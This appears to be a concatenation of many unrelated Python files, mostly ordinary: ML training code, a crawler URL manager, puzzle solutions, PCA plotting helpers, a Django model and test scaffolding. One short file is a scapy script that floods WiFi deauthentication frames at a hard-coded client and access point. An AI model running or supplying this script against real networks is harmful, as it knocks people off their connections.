# load a model pre-trained pre-trained on COCO
model = torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=True)
# replace the classifier with a new one, that has
# num_classes which is user-defined
num_classes = num_classes # 1 class (person) + background
# get number of input features for the classifier
in_features = model.roi_heads.box_predictor.cls_score.in_features
# replace the pre-trained head with a new one
model.roi_heads.box_predictor = FastRCNNPredictor(in_features, num_classes)
return model
def setup(rank):
# initialize the process group
dist.init_process_group(backend="nccl", rank=rank, init_method='env://', world_size=4)
# Explicitly setting seed to make sure that models created in two processes
# start from same random weights and biases.
torch.manual_seed(42)
torch.cuda.set_device(rank)
def get_transform(train):
transforms = []
if train:
transforms.append(T.RandomHorizontalFlip(0.5))
transforms.append(T.ToTensor())
return T.Compose(transforms)
def initialize_tensorboard(log_dir, common_name):
"""
In distributed training, tensorboard doesn't work with multiple writers
reference: https://stackoverflow.com/a/37411400/4569025
"""
tb_log_path = Path(log_dir).joinpath(common_name)
if not os.path.exists(tb_log_path):
os.mkdir(tb_log_path)
tb_writer = SummaryWriter(log_dir=tb_log_path)
return tb_writer
def update_train_loss(tb_writer, train_loss, epoch):
tb_writer.add_scalar(tag='train loss', scalar_value=train_loss, global_step=epoch)
def update_prediction_image(tb_writer, box, image, score, epoch, i):
tb_writer.add_image_with_boxes("Prediction {}".format(i), img_tensor=np.array(image), box_tensor=np.array(box),
global_step=epoch,
walltime=None, rescale=1, dataformats='CHW')
tb_writer.add_scalar(tag='IoU score', scalar_value=score, global_step=epoch)
def parse():
parser = argparse.ArgumentParser()
arg = parser.add_argument
arg('--data', metavar='DIR', help='path to dataset')
arg('--n-epochs', type=int, default=100)
arg('--batch-size', type=int, default=1)
arg('--lr', type=float, default=0.0001)
arg('--momentum', default=0.9, type=float, metavar='M', help='momentum')
arg('--weight-decay', '--wd', default=1e-4, type=float, metavar='W', help='weight decay (default: 1e-4)')
arg('--log-dir', metavar='DIR', help='path to save tensorboard logs', required=True)
arg('--save-as', metavar='NAME', help='save model as', required=True)
arg('--load-saved', metavar='DIR', help='path to load the previous saved model')
# args taken for NVIDIA-APEX
arg("--local_rank", default=0, type=int)
arg('--opt-level', type=str)
# arg('--keep-batchnorm-fp32', type=str, default=None)
# arg('--sync_bn', action='store_true', help='enabling apex sync BN.')
# arg('--loss-scale', type=str, default=None)
args = parser.parse_args()
return args
|
# _*_ coding: utf-8 _*_
"""
This module demonstrates how to manage the URL,
to distinguish which of them has been handled, or not been handled yet
"""
class LinkManager(object):
def __init__(self):
self.new_urls = set() # URL set to be crawled
self.old_urls = set() # URL set already crawled
def has_new_link(self):
"""check if there is new URL to be picked up"""
return self.size_new_url() != 0
def add_new_url(self, url):
""" add the new URL to the data set which hasn't been crawled
:param url: single url
:return:
"""
if url is None:
return
if url not in self.new_urls and url not in self.old_urls:
self.new_urls.add(url)
def add_new_urls(self, urls):
""" add the new URLs to the data set which hasn't been crawled
:param urls: url set
:return:
"""
if urls is None or len(urls) == 0:
return
for url in urls:
self.add_new_url(url)
def get_new_url(self):
""" get a new URL from the data set which hasn't been crawled"""
new_url = self.new_urls.pop()
self.old_urls.add(new_url)
return new_url
def size_new_url(self):
""" get a new URL from the data set which hasn't been crawled"""
return len(self.new_urls)
def size_old_url(self):
""" get a new URL from the data set which hasn't been crawled"""
return len(self.old_urls)
|
# Implement a data structure supporting the following operations:
# Inc(Key) - Inserts a new key with value 1. Or increments an existing key by 1. Key is guaranteed to be a non-empty string.
# Dec(Key) - If Key's value is 1, remove it from the data structure. Otherwise decrements an existing key by 1. If the key does not exist, this function does nothing. Key is guaranteed to be a non-empty string.
# GetMaxKey() - Returns one of the keys with maximal value. If no element exists, return an empty string "".
# GetMinKey() - Returns one of the keys with minimal value. If no element exists, return an empty string "".
# Challenge: Perform all these in O(1) time complexity.
from collections import defaultdict
class Bucket(object):
def __init__(self, rank):
self.rank = rank
self.keySet = set()
self.prev = None
self.next = None
class AllOne(object):
def __init__(self):
"""
Initialize your data structure here.
"""
self._keyValMap = defaultdict(int)
self._valKeyMap = {}
self._dummyHead = Bucket(0)
self._dummyTail = Bucket(0)
self._valKeyMap[0] = self._dummyHead
self._dummyHead.next = self._dummyTail
self._dummyTail.prev = self._dummyHead
def inc(self, key):
"""
Inserts a new key <Key> with value 1. Or increments an existing key by 1.
:type key: str
:rtype: void
"""
# handle keyValMap
self._keyValMap[key] += 1
curVal = self._keyValMap[key]
# handle valKeyMap
self._addKeyToBucket(curVal, key)
if curVal != 1:
self._deleteKeyFromBucket(curVal - 1, key)
def dec(self, key):
"""
Decrements an existing key by 1. If Key's value is 1, remove it from the data structure.
:type key: str
:rtype: void
"""
if key not in self._keyValMap:
return
# handle keyValMap
self._keyValMap[key] -= 1
curVal = self._keyValMap[key]
if curVal == 0:
self._keyValMap.pop(key)
# handle valKeyMap
if curVal != 0:
self._addKeyToBucket(curVal, key)
self._deleteKeyFromBucket(curVal + 1, key)
def getMaxKey(self):
"""
Returns one of the keys with maximal value.
:rtype: str
"""
maxBucket = self._dummyTail.prev
if maxBucket.rank == 0:
return ""
return iter(maxBucket.keySet).next()
def getMinKey(self):
"""
Returns one of the keys with Minimal value.
:rtype: str
"""
minBucket = self._dummyHead.next
if minBucket.rank == 0:
return ""
return iter(minBucket.keySet).next()
def _addKeyToBucket(self, value, key):
# if the Bucket doesnt exist, create the bucket first
if value not in self._valKeyMap:
newBucket = Bucket(value)
newBucket.rank = value
self._valKeyMap[value] = newBucket
prevBucket = self._valKeyMap.get(value - 1, None)
nextBucket = self._valKeyMap.get(value + 1, None)
if prevBucket:
newBucket.next = prevBucket.next
newBucket.prev = prevBucket
prevBucket.next = newBucket
newBucket.next.prev = newBucket
else:
newBucket.next = nextBucket
newBucket.prev = nextBucket.prev
nextBucket.prev = newBucket
newBucket.prev.next = newBucket
self._valKeyMap[value].keySet.add(key)
def _deleteKeyFromBucket(self, value, key):
deleteBucket = self._valKeyMap[value]
deleteBucket.keySet.remove(key)
if len(deleteBucket.keySet) == 0:
# handle valKeyMap
self._valKeyMap.pop(value)
# handle the linked List
deleteBucket.prev.next = deleteBucket.next
deleteBucket.next.prev = deleteBucket.prev
# if __name__ == '__main__':
# myds = AllOne()
# print myds.getMaxKey()
# print myds.getMinKey()
# myds.inc("inc")
# print myds.getMaxKey()
# print myds.getMinKey()
# Your AllOne object will be instantiated and called as such:
# obj = AllOne()
# obj.inc(key)
# obj.dec(key)
# param_3 = obj.getMaxKey()
# param_4 = obj.getMinKey() |
for tc in range(1, 11):
N = int(input())
area = [list(map(int, input().split())) for _ in range(100)]
cnt = 0
for x in range(100):
check = 0
for y in range(100):
if area[y][x] == 0:
continue
elif not check and area[y][x] == 2:
continue
elif check and area[y][x] == 2:
cnt += 1
check = 0
elif area[y][x] == 1:
check = 1
print('#{} {}'.format(tc, cnt)) |
# if elif else statement
# show ticket pricing
# 1 to 3 (free)
# 4 to 10 (150)
# 11 to 60 (250)
# above 60 (200)
age = int(input("please input your age: "))
if age == 0 or age < 0:
print("you can't watch")
elif 0 < age <= 3:
print("Ticket Price : Free")
elif 3 < age <= 10:
print("Ticket Price : 150")
elif 11 < age <= 60:
print("Ticket Price : 250")
elif age > 60:
print("Ticket Price : 200") |
import os
import re
def get_file_names(folderpath, output_file):
lst = os.listdir(folderpath)
with open(output_file, 'w') as file_object:
for line in lst:
file_object.write(line + "\n")
def get_all_file_names(path, output_file):
lst = []
for root, directories, files in os.walk(path, topdown=False):
for name in files:
lst.append(os.path.join(root, name)[len(path):])
for name in directories:
lst.append(os.path.join(root, name)[len(path):])
with open(output_file, 'w') as file_object:
for line in lst:
file_object.write(line + "\n")
def print_line_one(file_names):
for file in file_names:
with open(file,'r') as file_object:
print("\nFirst line in " + "\""+file + "\":\n" + "\n" + file_object.readlines()[0])
def print_emails(file_names):
for file in file_names:
with open(file,'r') as file_object:
for line in file_object.readlines():
if "@" in line:
print(line)
# print("File: " + file + "\n" + line)
def write_headlines(md_files, out):
new_list = []
for files in md_files:
with open(files, "r") as f:
for line in f:
if re.search("^#", line):
new_list.append(line)
with open(out, "w") as o:
for el in new_list:
o.write(el)
|
#-*-coding: utf-*-
from itertools import combinations
from nltk.tokenize import sent_tokenize, RegexpTokenizer
from nltk.stem.snowball import RussianStemmer
import networkx as nx
from sklearn.feature_extraction.text import CountVectorizer
import math
import re
import nltk
# nltk.download('stopwords')
def treatment_text(text):
text = re.sub("[^а-яА-Яa-zЁёA-Z0-9,.?]", " ", str(text))
text = text.replace('\t',' ')
text = text.replace('\n', ' ')
while text.find(' ')!=-1:
text = text.replace(' ',' ')
text = str(text)
return text
class TextRank():
def __init__(self):
self.pattern = "(?u)\\b[\\w-]+\\b"
def similarity_1(self,s1, s2):
if not len(s1) or not len(s2):
return 0.0
return len(s1.intersection(s2))/(1.0 * (len(s1) + len(s2)))
def similarity_2(self,s1,s2):
s1 = list(s1)
s2 = list(s2)
s1 = ' '.join(map(str,s1))
s2 = ' '.join(map(str,s2))
vectorizer = CountVectorizer()
x = vectorizer.fit_transform([s1, s2])
s1_v = vectorizer.transform([s1])
s2_v = vectorizer.transform([s2])
s1 = s1_v.toarray()[0]
s2 = s2_v.toarray()[0]
sum = 0
kv1 = 0
kv2 = 0
for i in range(s1.shape[0]):
sum += s1[i] * s2[i]
kv1 += s1[i] * s1[i]
kv2 += s2[i] * s2[i]
kv2 = math.sqrt(kv2) + 1e-8
kv1 = math.sqrt(kv1) + 1e-8
return sum / (kv1 * kv2)
def textrank(self,text,similar='serense'):
text = treatment_text(text)
text = text.split('.')
text = list(filter(lambda x: len(x.split()) > 6, text))
text = '.'.join(text)
sentences = sent_tokenize(text)
tokenizer = RegexpTokenizer(r'\w+')
lmtzr = RussianStemmer()
words = [set(lmtzr.stem(word) for word in tokenizer.tokenize(sentence.lower()))
for sentence in sentences]
pairs = combinations(range(len(sentences)), 2)
if similar == 'serense':
scores = [(i, j, self.similarity_1(words[i], words[j])) for i, j in pairs]
if similar == 'cos':
scores = [(i, j, self.similarity_2(words[i], words[j])) for i, j in pairs]
scores = filter(lambda x: x[2], scores)
g = nx.Graph()
g.add_weighted_edges_from(scores)
pr = nx.pagerank(g)
return sorted(((i, pr[i], s) for i, s in enumerate(sentences) if i in pr),
key=lambda x: pr[x[0]], reverse=True)
def extract(self,text,mera='serense',n=5):
tr = self.textrank(text,similar=mera)
top_n = sorted(tr[:n])
x = ' '.join(x[2] for x in top_n)
if x!='':
return x
else:
return 'Слишком маленький текст (минимум 5 предложений)'
|
#!/usr/bin/python
# Solution to problem 887A in codeforces
input = raw_input()
first_one_found = False
zero_count = 0
for letter in str(input):
if not first_one_found and letter == "1":
first_one_found = True
if first_one_found and letter == "0":
zero_count += 1
if zero_count >= 6:
print "yes"
else:
print "no" |
import sys
from heapq import heappush, heappop
class Node:
__slots__ = ('portal', 'edges')
def __init__(self, portal='', edges=None):
self.portal = portal
self.edges = edges or []
def __lt__(self, other):
return True
def out(x, y, bounds):
x0, y0, x1, y1 = bounds
return x < x0 or x > x1 or y < y0 or y > y1
def add_portals(nodes, portals, bounds):
aa = zz = None
ports = {}
while portals:
(x, y), c = portals.popitem()
port = None
node = None
if (x-1, y) in portals:
port = portals.pop((x-1, y)) + c
node = nodes.get((x-2, y)) or nodes.get((x+1, y))
elif (x+1, y) in portals:
port = c + portals.pop((x+1, y))
node = nodes.get((x-1, y)) or nodes.get((x+2, y))
elif (x, y-1) in portals:
port = portals.pop((x, y-1)) + c
node = nodes.get((x, y-2)) or nodes.get((x, y+1))
elif (x, y+1) in portals:
port = c + portals.pop((x, y+1))
node = nodes.get((x, y-1)) or nodes.get((x, y+2))
if port:
assert node
node.portal = port
if port in ports:
p, xp, yp = ports[port]
d = -1 if out(xp, yp, bounds) else 1
p.edges.append((1, d, node))
node.edges.append((1, -d, p))
else:
ports[port] = node, x, y
if port == 'AA':
aa = node
elif port == 'ZZ':
zz = node
return aa, zz
def scan_line(y, line, nodes, portals, bounds):
last = None
for x, c in enumerate(line):
if c in '# ':
if c == '#':
if not bounds[0]:
bounds[0] = x
if not bounds[1]:
bounds[1] = y
bounds[2] = x
bounds[3] = y
last = None
continue
if c.isupper():
portals[x, y] = c
continue
node = Node()
if last:
node.edges.append((1, 0, last))
last.edges.append((1, 0, node))
up = nodes.get((x, y-1))
if up:
node.edges.append((1, 0, up))
up.edges.append((1, 0, node))
nodes[x, y] = node
last = node
def read_file(name):
nodes = {}
portals = {}
bounds = [0, 0, 0, 0]
with open(name) as f:
for y, line in enumerate(f):
scan_line(y, line.rstrip(), nodes, portals, bounds)
aa, zz = add_portals(nodes, portals, bounds)
return nodes, aa, zz
def simplify(nodes):
while True:
some = False
for n in nodes.values():
if n.portal:
continue
if len(n.edges) == 1:
w, _, e = n.edges.pop()
e.edges.remove((w, 0, n))
some = True
elif len(n.edges) == 2:
wl, _, left = n.edges.pop()
wr, _, right = n.edges.pop()
w = wl + wr
left.edges.remove((wl, 0, n))
left.edges.append((w, 0, right))
right.edges.remove((wr, 0, n))
right.edges.append((w, 0, left))
some = True
if not some:
break
nodes = {k: n for k, n in nodes.items() if n.edges}
return nodes
def search(root, target):
q = [(0, root)]
seen = set()
while q:
d, n = heappop(q)
if n == target:
return d
seen.add(n)
for w, _, e in n.edges:
if e not in seen:
heappush(q, (d + w, e))
def search_rec(root, target):
q = [(0, 0, root)]
big = float('inf')
seen = {}
while q:
d, lvl, n = heappop(q)
if lvl == 0 and n == target:
return d
for w, x, e in n.edges:
new_lvl = lvl + x
if new_lvl < 0:
continue
if d + w < seen.get((e, new_lvl), big):
seen[e, new_lvl] = d + w
heappush(q, (d + w, new_lvl, e))
nodes, root, target = read_file('input.txt' if len(sys.argv) < 2 else sys.argv[1])
nodes = simplify(nodes)
best = search(root, target)
print('Day 20, part 1:', best)
best = search_rec(root, target)
print('Day 20, part 2:', best)
|
""" Librairie personnelle effectuer des graphiques sur Analyse en
composantes principales
"""
#! /usr/bin/env python3
# coding: utf-8
# ====================================================================
# Outil visualisation - projet 3 Openclassrooms
# Version : 0.0.0 - CRE LR 13/03/2021
# Version : 0.0.1 - CRE LR 30/03/2021 P4 Openclassrooms
# ====================================================================
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.collections import LineCollection
import matplotlib.patches as mpatches
import seaborn as sns
from sklearn import decomposition
# --------------------------------------------------------------------
# -- VERSION
# --------------------------------------------------------------------
__version__ = '0.0.1'
# --------------------------------------------------------------------
# Analyse en composantes principales
# --------------------------------------------------------------------
def creer_analyse_composantes_principales(
x_train,
liste_tuples_composantes,
affiche_graph=True):
'''
Analyse en composante principale
Parameters
----------
x_train : Variable à analyser, obligatoire
liste_tuples_composantes : liste des tuples des composantes à afficher
exemple : PC1/PC2 et PC3/PC4 ==> [(0, 1), (2, 3)], obligatoire
affiche_graph : affiche les autres graphiques ; éboulis, distribution...
Returns
-------
None.
'''
# Sélection des colonnes pour l'ACP
cols_acp = x_train.columns.to_list()
# Nombre de composantes
n_comp = len(cols_acp)
# Calcul des composantes principales
pca = decomposition.PCA(n_components=n_comp)
pca.fit(x_train)
if affiche_graph:
# Distribution des composantes principales de l'ACP
C = pca.transform(x_train)
plt.figure(figsize=(8, 5))
plt.boxplot(C)
plt.title('Distribution des composantes principales')
plt.grid(False)
plt.show()
# quel est le pourcentage de variance préservé par chacune de
# nos composantes?
variances = pca.explained_variance_ratio_
# quelle est la somme cumulée de chacune de ces variances?
meilleur_dims = np.cumsum(variances)
# on va trouver le moment où on atteint 95% ou 99% entre réduire au maxi
# où garder au maxi
plt.plot(meilleur_dims)
# argmax pour > 95 %
best = np.argmax(meilleur_dims > 0.95)
plt.axhline(y=0.95, color='r')
plt.text(2, 0.96, '>95%', color='r', fontsize=10)
plt.axvline(x=best, color='r')
# argmax pour > 99 %
best99 = np.argmax(meilleur_dims > 0.99)
plt.axhline(y=0.99, color='g')
plt.text(2, 1, '>99%', color='g', fontsize=10)
plt.axvline(x=best99, color='g')
plt.title('Taux cumulé de variances expliquées pour les composantes')
plt.xlabel('Nombre de composantes')
plt.ylabel('Taux cumulé des variances')
plt.show()
print(f'Nombre de composantes expliquant 95% de la variance : {best}')
print(
f'Nombre de composantes expliquant 99% de la variance : {best99}')
df_acp = pd.DataFrame(pca.components_,
index=['PC' + str(i + 1) for i in range(n_comp)],
columns=cols_acp).T
# Matrice des coefficients des composantes principales
fig, ax = plt.subplots(figsize=(8, 8))
palette = sns.diverging_palette(240, 10, n=9)
sns.heatmap(df_acp, fmt='.2f',
cmap=palette, vmin=-1, vmax=1, center=0, ax=ax)
plt.title('Coefficient des composantes principales', fontsize=14)
plt.show()
# Affichage du graphique des éboulis des valeurs propres
display_scree_plot(pca)
# Affichage du cercle des corrélations
pcs = pca.components_
display_circles(
pcs,
n_comp,
pca,
liste_tuples_composantes,
labels=np.array(cols_acp),
label_rotation=0,
lims=None,
width=7,
n_cols=1)
# --------------------------------------------------------------------
# -- AFFICHE LE CERCLE DES CORRELATIONS
# --------------------------------------------------------------------
def display_circles(
pcs,
n_comp,
pca,
axis_ranks,
labels=None,
label_rotation=0,
lims=None,
width=16,
n_cols=3):
"""
Affiche le cercle des corrélations
Parameters
----------
pcs : les composantes de l'ACP, obligatoire
n_comp : nombre de composantes de l'ACP'
pca : pca_decomposition, obligatoire
axis_ranks : liste des composantes, obligatoire
labels : libellés, Facultatif (None par défaut)
label_rotation : degré de rotation des libellés, facultatif (0 par défaut)
lims : y,x limites, facultatif (None par défaut)
Returns
-------
None.
"""
n_rows = (n_comp + 1) // n_cols
fig = plt.figure(figsize=(width, n_rows * width / n_cols))
# boucle sur les plans factoriels (3 premiers plans -> 6 composantes)
for i, (d1, d2) in enumerate(axis_ranks):
if d2 < n_comp:
ax = fig.add_subplot(n_rows, n_cols, i + 1)
# limites
if lims is not None:
xmin, xmax, ymin, ymax = lims
elif pcs.shape[1] < 30:
xmin, xmax, ymin, ymax = -1, 1, -1, 1
else:
xmin, xmax, ymin, ymax = min(pcs[d1, :]), max(
pcs[d1, :]), min(pcs[d2, :]), max(pcs[d2, :])
# flèches, si plus de 30, pas de pointes
if pcs.shape[1] < 30:
plt.quiver(np.zeros(pcs.shape[1]),
np.zeros(pcs.shape[1]),
pcs[d1,
:],
pcs[d2,
:],
angles='xy',
scale_units='xy',
scale=1,
color='black')
else:
lines = [[[0, 0], [x, y]] for x, y in pcs[[d1, d2]].T]
ax.add_collection(
LineCollection(
lines,
alpha=.1,
color='black'))
# noms de variables
if labels is not None:
for text, (x, y) in enumerate(pcs[[d1, d2]].T):
if x >= xmin and x <= xmax and y >= ymin and y <= ymax:
ax.text(
x,
y,
labels[text],
fontsize='14',
ha='center',
va='center',
rotation=label_rotation,
color="black",
alpha=0.5)
# cercle
circle = plt.Circle((0, 0), 1, facecolor='none', edgecolor='k')
ax.add_artist(circle)
# définition des limites du graphique
ax.set(xlim=(xmin, xmax), ylim=(ymin, ymax))
ax.set_aspect('equal')
# affichage des lignes horizontales et verticales
ax.plot([-1, 1], [0, 0], color='black', ls='--')
ax.plot([0, 0], [-1, 1], color='black', ls='--')
# nom des axes, avec le pourcentage d'inertie expliqué
ax.set_xlabel(
'PC{} ({}%)'.format(
d1 +
1,
round(
100 *
pca.explained_variance_ratio_[d1],
1)))
ax.set_ylabel(
'PC{} ({}%)'.format(
d2 +
1,
round(
100 *
pca.explained_variance_ratio_[d2],
1)))
ax.set_title(
'PCA correlation circle (PC{} and PC{})'.format(
d1 + 1, d2 + 1))
plt.axis('square')
plt.grid(False)
plt.tight_layout()
plt.show()
# --------------------------------------------------------------------
# -- AFFICHE LE PLAN FACTORIEL
# --------------------------------------------------------------------
def display_factorial_planes(
X_proj,
n_comp,
pca,
axis_ranks,
couleurs=None,
labels=None,
width=16,
alpha=1,
n_cols=3,
illus_var=None,
lab_on=True,
size=10):
"""
Affiche le plan factoriel
Parameters
----------
X_projected : projection de X, obligatoire
n_comp : nombre de composantes, obligatoire
pca : pca decomposition, obligatoire
axis_ranks :
labels : libellés, facultatif (None par défaut)
alpha : alpha, facultatif (1 par défaut)
illustrative_var : variable à illustrer, facultatif (None par défaut)
Returns
-------
None.
"""
n_rows = (n_comp + 1) // n_cols
fig = plt.figure(figsize=(width, n_rows * width / n_cols))
# boucle sur chaque plan factoriel
for i, (d1, d2) in (enumerate(axis_ranks)):
if d2 < n_comp:
ax = fig.add_subplot(n_rows, n_cols, i + 1)
# points
if illus_var is None:
ax.scatter(X_proj[:, d1], X_proj[:, d2], alpha=alpha, s=size)
else:
illus_var = np.array(illus_var)
label_patches = []
colors = couleurs
i = 0
for value in np.unique(illus_var):
sel = np.where(illus_var == value)
ax.scatter(X_proj[sel, d1], X_proj[sel, d2],
alpha=alpha, label=value, c=colors[i])
label_patch = mpatches.Patch(color=colors[i],
label=value)
label_patches.append(label_patch)
i += 1
ax.legend(
handles=label_patches,
bbox_to_anchor=(
1.05,
1),
loc=2,
borderaxespad=0.,
facecolor='white')
# labels points
if labels is not None and lab_on:
for text_lab, (x, y) in enumerate(X_proj[:, [d1, d2]]):
ax.text(x, y, labels[text_lab],
fontsize='14', ha='center', va='center')
# limites
bound = np.max(np.abs(X_proj[:, [d1, d2]])) * 1.1
ax.set(xlim=(-bound, bound), ylim=(-bound, bound))
# lignes horizontales et verticales
ax.plot([-100, 100], [0, 0], color='grey', ls='--')
ax.plot([0, 0], [-100, 100], color='grey', ls='--')
# nom des axes, avec le pourcentage d'inertie expliqué
ax.set_xlabel(
'F{} ({}%)'.format(
d1 +
1,
round(
100 *
pca.explained_variance_ratio_[d1],
1)))
ax.set_ylabel(
'F{} ({}%)'.format(
d2 +
1,
round(
100 *
pca.explained_variance_ratio_[d2],
1)))
ax.set_title(
'Projection des individus (sur F{} et F{})'.format(
d1 + 1, d2 + 1))
plt.grid(False)
plt.tight_layout()
# --------------------------------------------------------------------
# -- AFFICHE L'EBOULIS DES VALEURS PROPRES
# --------------------------------------------------------------------
def display_scree_plot(pca):
'''
Affiche l'éboulis des valeurs propres.
Parameters
----------
pca : pca decompostion, obligatoire.
Returns
-------
None.
'''
taux_var_exp = pca.explained_variance_ratio_
scree = taux_var_exp * 100
plt.bar(np.arange(len(scree)) + 1, scree, color='SteelBlue')
ax1 = plt.gca()
ax2 = ax1.twinx()
ax2.plot(np.arange(len(scree)) + 1, scree.cumsum(), c='red', marker='o')
ax2.set_ylabel('Taux cumulatif de l\'inertie')
ax1.set_xlabel('Rang de l\'axe d\'inertie')
ax1.set_ylabel('Pourcentage d\'inertie')
for i, p in enumerate(ax1.patches):
ax1.text(
p.get_width() /
5 +
p.get_x(),
p.get_height() +
p.get_y() +
0.3,
'{:.0f}%'.format(
taux_var_exp[i] *
100),
fontsize=8,
color='k')
plt.title('Eboulis des valeurs propres')
plt.gcf().set_size_inches(8, 4)
plt.grid(False)
plt.show(block=False)
|
def appendsums(lst):
i=0
while i<25:
l=len(lst)
sum=lst[l-1]+lst[l-2]+lst[l-3]
lst.append(sum)
i+=1
sum_three = [0, 1, 2]
appendsums(sum_three)
print (sum_three[20])
|
# coding:utf-8
# 把街道按照上面发生的所有犯罪的分布进行编码
import pandas as pd
import numpy as np
import pickle
file_key = 'fold_1'
original_train = pd.read_csv('../0_direct/' + file_key + '.csv')
# 统计各个街道上面各类犯罪的分布,街道编号由1到2128
street_stats = []
for i in range(2129):
street_stats.append(np.zeros(40))
for i in range(len(original_train)):
addresses = [0, 0]
addresses[0] = int(original_train.loc[i, 'Address1'])
addresses[1] = int(original_train.loc[i, 'Address2'])
category = int(original_train.loc[i, 'Category'])
for street in addresses:
if street > 0:
street_stats[street][category] += 1
if (i % 20000 == 0):
print i
pickle.dump(street_stats, file('street_counts' + file_key + '.pickle', 'w')) |
#!/usr/bin/env python
#coding:utf-8
from scapy.all import *
def wifi_down(client_mac, bssid):
pkt = RadioTap() / Dot11(subtype=0x00c, addr1=client_mac, addr2=bssid, addr3=bssid) / Dot11Deauth(reason=0)
while(True):
sendp(pkt, iface='wlan0')
if __name__ == '__main__':
wifi_down('ec:1d:7f:bc:b3:a8', 'E4:D3:32:4B:03:9C') |
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Blogs(models.Model):
title = models.CharField(max_length=200)
time = models.DateTimeField(auto_now_add=True)
body = models.TextField()
image = models.ImageField(blank=False, upload_to='blogs/images/')
user = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return self.title
class Comments(models.Model):
name = models.CharField(max_length=200)
body = models.TextField(blank=True)
time = models.DateTimeField(auto_now_add=True)
blog = models.ForeignKey(Blogs , on_delete=models.CASCADE , related_name='comments')
class Posts(models.Model):
title = models.CharField(max_length=200)
time = models.DateTimeField(auto_now_add=True)
description = models.CharField(max_length=300)
image = models.ImageField(upload_to='posts/images/')
url = models.URLField()
def __str__(self):
return self.title
|
from distutils.core import setup
from Cython.Build import cythonize
setup(ext_modules = cythonize("ObsPred.pyx"))
|
import threading
from datetime import datetime
import time
from app.model.SqlExecuter import SqlExecuter
from app.util.vkApiHelper import VKAPIHelpers
class lookerThread(threading.Thread):
name = None
vk_id = -1
api = None
db = None
interval = None
is_alive = True
def __init__(self,name,vk_id,api,intervalInSec):
threading.Thread.__init__(self)
self.name = name
self.vk_id = vk_id
self.api = api
self.interval = intervalInSec
# self.db = db
def run(self):
while self.is_alive:
fields = ["photo_400_orig","photo_200", "photo_100", "photo_200_orig","photo_50", "photo_max", "photo_max_orig"]
try:
request = self.api.users.get(user_id=self.vk_id,fields=['online']+fields)
except:
time.sleep(30)
continue
online = request[0]['online']
image_url = VKAPIHelpers.getAvailablePhotoUrl(request[0],fields)
cursor = SqlExecuter.executeModification('insert into online("online","vk_id") values({},{});'.format(online,self.vk_id))
time.sleep(self.interval)
|
#
# Copyright (c) 2023 Airbyte, Inc., all rights reserved.
#
import json
import subprocess
import sys
import pytest
from airbyte_cdk.models import AirbyteErrorTraceMessage, AirbyteLogMessage, AirbyteMessage, AirbyteTraceMessage
def test_uncaught_exception_handler():
cmd = "from airbyte_cdk.logger import init_logger; from airbyte_cdk.exception_handler import init_uncaught_exception_handler; logger = init_logger('airbyte'); init_uncaught_exception_handler(logger); raise 1"
exception_message = "exceptions must derive from BaseException"
exception_trace = (
"Traceback (most recent call last):\n"
' File "<string>", line 1, in <module>\n'
"TypeError: exceptions must derive from BaseException"
)
expected_log_message = AirbyteMessage(
type="LOG", log=AirbyteLogMessage(level="FATAL", message=f"{exception_message}\n{exception_trace}")
)
expected_trace_message = AirbyteMessage(
type="TRACE",
trace=AirbyteTraceMessage(
type="ERROR",
emitted_at=0.0,
error=AirbyteErrorTraceMessage(
failure_type="system_error",
message="Something went wrong in the connector. See the logs for more details.",
internal_message=exception_message,
stack_trace=f"{exception_trace}\n",
),
),
)
with pytest.raises(subprocess.CalledProcessError) as err:
subprocess.check_output([sys.executable, "-c", cmd], stderr=subprocess.STDOUT)
assert not err.value.stderr, "nothing on the stderr"
stdout_lines = err.value.output.decode("utf-8").strip().split("\n")
assert len(stdout_lines) == 2
log_output, trace_output = stdout_lines
out_log_message = AirbyteMessage.parse_obj(json.loads(log_output))
assert out_log_message == expected_log_message, "Log message should be emitted in expected form"
out_trace_message = AirbyteMessage.parse_obj(json.loads(trace_output))
assert out_trace_message.trace.emitted_at > 0
out_trace_message.trace.emitted_at = 0.0 # set a specific emitted_at value for testing
assert out_trace_message == expected_trace_message, "Trace message should be emitted in expected form"
|
import functools
import os
import time
from testtools import content, content_type
import fixtures
import testresources
import testtools
from common.contrail_test_init import ContrailTestInit
from common import log_orig as contrail_logging
#from common import config
import logging as std_logging
from tcutils.util import get_unique_random_name
# License: Apache-2.0
# Copyright 2012 OpenStack Foundation
# https://github.com/openstack/tempest/blob/master/tempest/test.py
def attr(*args, **kwargs):
"""A decorator which applies the testtools attr decorator
This decorator applies the testtools.testcase.attr if it is in the list of
attributes to testtools we want to apply.
"""
def decorator(f):
if 'type' in kwargs and isinstance(kwargs['type'], str):
f = testtools.testcase.attr(kwargs['type'])(f)
elif 'type' in kwargs and isinstance(kwargs['type'], list):
for attr in kwargs['type']:
f = testtools.testcase.attr(attr)(f)
return f
return decorator
#LOG = logging.getLogger(__name__)
std_logging.getLogger('urllib3.connectionpool').setLevel(std_logging.WARN)
std_logging.getLogger('paramiko.transport').setLevel(std_logging.WARN)
std_logging.getLogger('keystoneclient.session').setLevel(std_logging.WARN)
std_logging.getLogger('keystoneclient.httpclient').setLevel(std_logging.WARN)
std_logging.getLogger('neutronclient.client').setLevel(std_logging.WARN)
#
#CONF = config.CONF
class TagsHack(object):
def id(self):
orig = super(TagsHack, self).id()
tags = os.getenv('TAGS', '')
if not tags:
return orig
else:
fn = self._get_test_method()
attributes = getattr(fn, '__testtools_attrs', None)
tags = tags.split(" ")
if attributes:
for tag in tags:
if tag in attributes:
return orig
# A hack to please testtools to get uniq testcase names
return get_unique_random_name()
class BaseTestCase(TagsHack,
testtools.testcase.WithAttributes,
testtools.TestCase,
testresources.ResourcedTestCase):
setUpClassCalled = False
@classmethod
def setUpClass(cls):
if hasattr(super(BaseTestCase, cls), 'setUpClass'):
super(BaseTestCase, cls).setUpClass()
cls.setUpClassCalled = True
if 'TEST_CONFIG_FILE' in os.environ :
cls.ini_file= os.environ.get('TEST_CONFIG_FILE')
else:
cls.ini_file= 'sanity_params.ini'
cls.logger = contrail_logging.getLogger(cls.__name__)
cls.inputs = ContrailTestInit(cls.ini_file,logger = cls.logger)
@classmethod
def tearDownClass(cls):
# License: Apache-2.0
# Copyright 2012 OpenStack Foundation
# https://github.com/openstack/tempest/blob/master/tempest/test.py
#cls.logger.cleanUp()
if hasattr(super(BaseTestCase, cls), 'tearDownClass'):
super(BaseTestCase, cls).tearDownClass()
# License: Apache-2.0
